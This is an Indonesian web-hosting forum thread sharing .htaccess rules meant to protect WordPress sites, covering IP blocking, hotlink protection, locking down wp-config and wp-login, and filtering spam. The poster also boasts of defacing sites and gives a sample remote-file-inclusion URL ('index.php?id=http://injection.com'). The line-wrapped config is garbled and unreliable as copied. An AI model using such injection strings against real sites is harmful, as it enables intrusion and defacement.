tips melindungi web dari hacked

Discussion in 'Masalah Teknik dan Keamanan' started by INDTEAM, 13 Aug 2012.

Thread Status:
Not open for further replies.
  1. INDTEAM

    INDTEAM Poster 2.0

    Messages:
    111
    Likes Received:
    12
    Trophy Points:
    18
    sedikit mudah2an berguna untk melindungi defacer :D


    Modifed .htacess

    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    order deny,allow
    deny from all
    # IP address anda
    allow from xx.xxx.xxx.xx
    Ganti xx.xxx.xxx.xx di atas â†'
    dengan alamat IP anda
    (beberapa IP address juga
    bisa ditambahkan).
    IP Blacklist
    Tambahkan baris-baris
    berikut untuk mencegah
    alamat IP tertentu
    mengakses blog anda.
    order allow,deny
    allow from all
    deny from xxx.xxx.xxx
    HotLinking
    HotLinking berguna untuk
    mencegah website lain
    mengambil source file
    tertentu (misalnya gambar)
    untuk dipasang di website
    mereka (pencurian
    bandwidth)
    RewriteCond
    %{HTTP_REFERER} !^$
    RewriteCond
    %{HTTP_REFERER} !^http ://
    (www\.)?yourdomain. com/.*$
    [NC]
    RewriteCond
    %{HTTP_REFERER} !^http ://
    (www\.)?fyourdomain. com$
    [NC]
    RewriteRule .*\.(gif|jpg|
    png)$ http ://yourdomain. com/
    stealingisbad.gif [R,NC]
    Tips: Pengaturan hotlinking
    juga bisa langsung dilakukan
    melalui menu HotLink
    Protection pada cPanel.
    Melindungi WP-Config.php
    Melindungi file wp-config.php
    yang berisi informasi nama
    database, username
    database, dan password
    database anda â†"
    # protect wpconfig.php
    order allow,deny
    deny from all
    Directory browsing
    Tambahkan baris berikut
    untuk mencegah seseorang
    melihat isi semua direktori
    langsung melalui browser
    â†"
    # disable directory browsing
    Options All -Indexes
    Melindungi WP-Login.php
    Baris berikut cuma buat anda
    penakut yang tidak
    mengijinkan siapapun yang
    mencoba login dengan
    mengakses wp-login.php
    Order deny,allow
    Deny from All
    Allow from xxx.xxx.xxx.x
    Alamat IP di atas adalah
    satu-satunya alamat IP yang
    diijinkan mengakses wp-
    login.php
    Melindungi WP-Comment-
    Post.php dari spam
    Walaupun ada Akismet, tapi
    mungkin perlu juga kita
    melindungi blog kita dari
    serangan spambot yang
    mencoba mengirim komentar
    spam langsung melalui wp-
    comment-post.php tanpa
    mengakses blog kita
    RewriteEngine On
    RewriteCond
    %{REQUEST_METHOD} POST
    RewriteCond
    %{REQUEST_URI} .wp-
    comments-post\.php*
    RewriteCond
    %{HTTP_REFERER} !.*yourblog

    .com.* [OR]
    RewriteCond
    %{HTTP_USER_AGENT} ^$
    RewriteRule (.*) ^http ://
    %{REMOTE_ADDR}/$
    [R=301,L]
    Ganti yourblog.com dengan
    alamat blog kita
    Mencegah spammer
    Mencegah spammer yang
    menggunakan alamat IP
    tertentu bisa dilakukan
    dengan mudah dengan
    .htaccess â†"
    order allow,deny
    deny from xxx.xx.xxx.xxx
    allow from all
    Melindungi RSS
    RSS feed bisa dilindungi dari
    ulah pencuri konten
    (scraper) yang mencoba
    mencuri artikel kita dengan
    memanfaatkan RSS feed blog
    kita
    RewriteEngine on
    RewriteCond
    %{REMOTE_ADDR}
    ^xx.xx.xxx.xx
    RewriteRule ^(.*)$ http ://
    newfeedurl. com/feed
    Alamat IP di atas adalah
    alamat IP yang digunakan
    scraper (bisa dicari di
    Google), sedangkan alamat
    feed di atas digunakan
    sebagai alamat tujuan
    pengalihan dari alamat feed
    blog kita.
    Melindungi file .htaccess
    Setelah blog kita terlindungi
    dari serangan htaccess,
    maka file .htaccess itu
    sendiri juga perlu kita
    amankan dari serangan.
    Kode berikut ini ditambahkan
    pada file .htaccess untuk
    mengamankan file dengan
    awalan .hta
    # STRONG HTACCESS
    PROTECTION
    order allow,deny
    deny from all
    satisfy all


    tp saya tdk menjamin itu akan membuat aman karena defacer web ada ribuan cara Tuan (back connect ,irc scner, attck ip ,telnet ,ssh shell dll ):p tentu bg saya agx ksulitan buat depes xixixi


    Kalo ada yg mau uji security web saya boleh
    Contoh LFI,RFI ALL attackerz
    wap.jawanet. com/index.php?id=http ://injection. com

    Buat hosting yang ingin ke amananan extra bs PM me tp gk sembarangan orang tak kasih script protex all hacked krn modif+menyatukan ke semua cms jg agax ribet dl hehehehe ok good luck semoga web anda aman...

    my fb : facebook.com/indra.timhaker
     
    Sanisa, sigmabisnis and galuh82 like this.
  2. INDTEAM

    INDTEAM Poster 2.0

    Messages:
    111
    Likes Received:
    12
    Trophy Points:
    18
    maaf untk http dan .com saya pisahkan karna tidk boleh posting pake link hufh .
     
  3. jaapns

    jaapns Hosting Guru Web Hosting

    Messages:
    3,256
    Likes Received:
    442
    Trophy Points:
    83
    bro itu kalo htaccess tercampur dengan settingan plugin wordpress BPS, w3 total cache apa nggak conflict ? apa bisa cukup di tambahkan , rules nya tidak bertentangan ?
     
  4. mixmaxspace

    mixmaxspace Hosting Guru

    Messages:
    1,235
    Likes Received:
    99
    Trophy Points:
    48
    Nah ini dia yang ditunggu-tunggu, kontribusinya, hahaha. Makasih mas bro.
    Semoga tuhan memberkati :D
     
  5. sigmabisnis

    sigmabisnis Hosting Guru Web Hosting (Company)

    Messages:
    2,181
    Likes Received:
    144
    Trophy Points:
    63
    boleh juga nih tips nya mas indra... thanks yaa :)
     
  6. INDTEAM

    INDTEAM Poster 2.0

    Messages:
    111
    Likes Received:
    12
    Trophy Points:
    18
    tidak apa Tuan bisa ! Tapi ada juga yang pengaturan server tdk support strink comand
     
  7. INDTEAM

    INDTEAM Poster 2.0

    Messages:
    111
    Likes Received:
    12
    Trophy Points:
    18
    ok mudah2an bermanfaat Tuan ,skedar sharing ! Bulan ramadhan lg stop kriminil xixixixi
     
  8. Vicshare

    Vicshare New Member

    Messages:
    4
    Likes Received:
    1
    Trophy Points:
    3
    Wah benar tuh bang.., sy juga udah prnah nyoba ko.. total cache nya ga bisa conflict...
     
  9. klikmediacorp

    klikmediacorp Beginner 2.0

    Messages:
    40
    Likes Received:
    11
    Trophy Points:
    8
    mantabbb bro tipsnya, thanks
     
  10. INDTEAM

    INDTEAM Poster 2.0

    Messages:
    111
    Likes Received:
    12
    Trophy Points:
    18
    sama2 pak :36:
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...